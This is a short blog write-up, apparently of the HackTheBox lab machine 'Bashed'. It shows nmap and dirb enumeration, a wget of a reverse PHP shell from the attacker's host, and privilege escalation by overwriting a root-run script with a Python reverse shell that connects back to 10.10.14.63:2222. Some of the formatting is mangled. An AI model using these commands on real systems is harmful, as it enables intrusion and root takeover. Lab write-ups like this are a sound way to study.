Bashed Write-Up

1- Network enumeration:

nmap —sV -sC 10.129.156.242 -p 80-sV to determine service/version info
-sC to use the default Nmap scripts
  • the http port is opend:

2-directory brut force:

nmap — script=http-enum 10.129.156.242 -p 80
$ dirb http://10.129.155.176/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
$ python3 -m http.server 12344
$ wget 10.10.14.63:12344/revers.php
$ python -c "import pty; pty.spawn('/bin/bash');"
www-data@bashed:/$ ls -la
www-data@bashed:/$ sudo -u scriptmanager bash
scriptmanager@bashed:/$
scriptmanager@bashed:/$ cd scripts
scriptmanager@bashed:/scripts$ ls -la
total 16
drwxrwxr — 2 scriptmanager scriptmanager 4096 Dec 4 2017 .
drwxr-xr-x 23 root root 4096 Dec 4 2017 ..
-rw-r — r — 1 scriptmanager scriptmanager 217 Mar 15 10:49 test.py
-rw-r — r — 1 root root 12 Mar 15 10:38 test.txt
scriptmanager@bashed:/scripts$
scriptmanager@bashed:/scripts$ cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
scriptmanager@bashed:/scripts$scriptmanager@bashed:/scripts$ cat test.txt
testing 123!scriptmanager@bashed:/scripts$

4-Escalation:

echo 'import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.63",2222))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]); ' >test.py

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

What coding language is best for 8–10-year-old kids? Would Python be too complex at that age?

Micro frontends: Composition

Goodbye Electron, Hello Flutter

Why your startup has to do DevOps from day one

Handling Complexity: Using Sagas to Provide Transactional Support for Distributed Systems

Manage macOS Cross-Site Tracking with MDM

Making Circle in CSS Step by Step

[Algorithm] Linked List to Integer (Tree/C++)

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Mohamed isselmou

Mohamed isselmou

@isselmou

More from Medium

How do Red Team Exercises help CISO to Validate the Security Controls Effectively?

BOUNTYHUNTER — HackTheBox WriteUp

Paper — HacktheBox Walkthrough

MAL: Malware Introductory — TryHackMe CTF